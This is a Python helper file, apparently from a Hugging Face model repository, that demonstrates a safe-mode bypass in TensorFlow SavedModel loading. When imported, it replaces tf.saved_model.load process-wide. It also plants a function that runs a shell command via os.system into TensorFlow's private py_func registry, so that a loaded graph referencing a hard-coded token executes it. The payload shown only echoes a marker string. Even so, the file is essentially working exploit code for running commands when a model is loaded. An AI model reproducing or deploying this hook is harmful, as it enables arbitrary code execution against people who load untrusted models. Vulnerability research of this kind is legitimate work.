keras_attmpt / helpers.py
aakashjapi's picture
Upload folder using huggingface_hub
0776746 verified
import os
from pathlib import Path
import tensorflow as tf
from tensorflow.python.ops import script_ops
# String echoed to stdout by _payload's shell command; presumably used to
# detect from the output that _payload actually ran.
# NOTE(review): the name suggests this module is a proof-of-concept for a
# safe-mode bypass during model loading -- confirm intent before importing it
# in any trusted environment.
PAYLOAD_MARKER = 'ENTRY_SCRIPT_SAFE_MODE_BYPASS'
# Keys under which _payload is written into TensorFlow's private py_func
# registry by the loop at the bottom of this module.
TOKENS = ['tfsm_entry_script_token']
# Directory containing this file, with symlinks resolved.
REPO_ROOT = Path(__file__).resolve().parent
# Path that _patched_load substitutes for the bare string 'saved_model'.
SAVED_MODEL_PATH = REPO_ROOT / 'saved_model'
# The unpatched tf.saved_model.load, captured before this module replaces it,
# so that _patched_load can delegate to the real implementation.
_ORIG_SAVED_MODEL_LOAD = tf.saved_model.load
def _payload(*_args, **_kwargs):
    """Run ``echo <PAYLOAD_MARKER>`` through the system shell and return 0.

    Accepts and ignores any positional and keyword arguments, so it can stand
    in for a callback invoked with an arbitrary signature. The registration
    loop at the bottom of this module installs it in TensorFlow's py_func
    registry.

    WARNING: this executes a shell command via os.system. It is wired into
    TensorFlow's registry as a side effect of importing this module.

    Returns:
        0, regardless of the shell command's exit status (os.system's return
        value is discarded).
    """
    # PAYLOAD_MARKER is a module constant, so this shell string is not built
    # from external input. Interpolating anything user-controlled here would
    # allow shell injection.
    os.system(f"echo {PAYLOAD_MARKER}")
    return 0
def _patched_load(path, *args, **kwargs):
    """Forward to the original ``tf.saved_model.load``, resolving the bare
    name ``'saved_model'`` to this repository's copy.

    Only a ``str`` (or ``str`` subclass) equal to ``'saved_model'`` is
    rewritten, to ``str(SAVED_MODEL_PATH)``. Every other value, including
    ``pathlib.Path`` objects, is passed through unchanged. All extra
    positional and keyword arguments are forwarded as-is.
    """
    # Anything that is not exactly the bare relative name goes straight through.
    if not (isinstance(path, str) and path == 'saved_model'):
        return _ORIG_SAVED_MODEL_LOAD(path, *args, **kwargs)
    # Anchor the relative name to this file's directory so the load does not
    # depend on the current working directory.
    return _ORIG_SAVED_MODEL_LOAD(str(SAVED_MODEL_PATH), *args, **kwargs)
# Import-time side effect: replace tf.saved_model.load process-wide with the
# redirecting wrapper defined above. Every later call to tf.saved_model.load
# in this process goes through _patched_load.
tf.saved_model.load = _patched_load

# Strong references to every function placed in the registry below.
# NOTE(review): TensorFlow's script_ops.FuncRegistry appears to store entries
# in a weakref.WeakValueDictionary, which is presumably why these references
# are kept -- confirm against the installed TF version. _payload is also a
# module-level name, so it stays alive regardless.
_REGISTERED = []
# WARNING: this writes directly into TensorFlow's PRIVATE py_func registry
# (script_ops._py_funcs._funcs), mapping each hard-coded token to _payload.
# Presumably any PyFunc op in a loaded graph that references one of these
# tokens will then dispatch to _payload and run its shell command -- verify
# against TF's script_ops implementation. This depends on private TF internals
# and runs as soon as this module is imported.
for token in TOKENS:
    script_ops._py_funcs._funcs[token] = _payload
    _REGISTERED.append(_payload)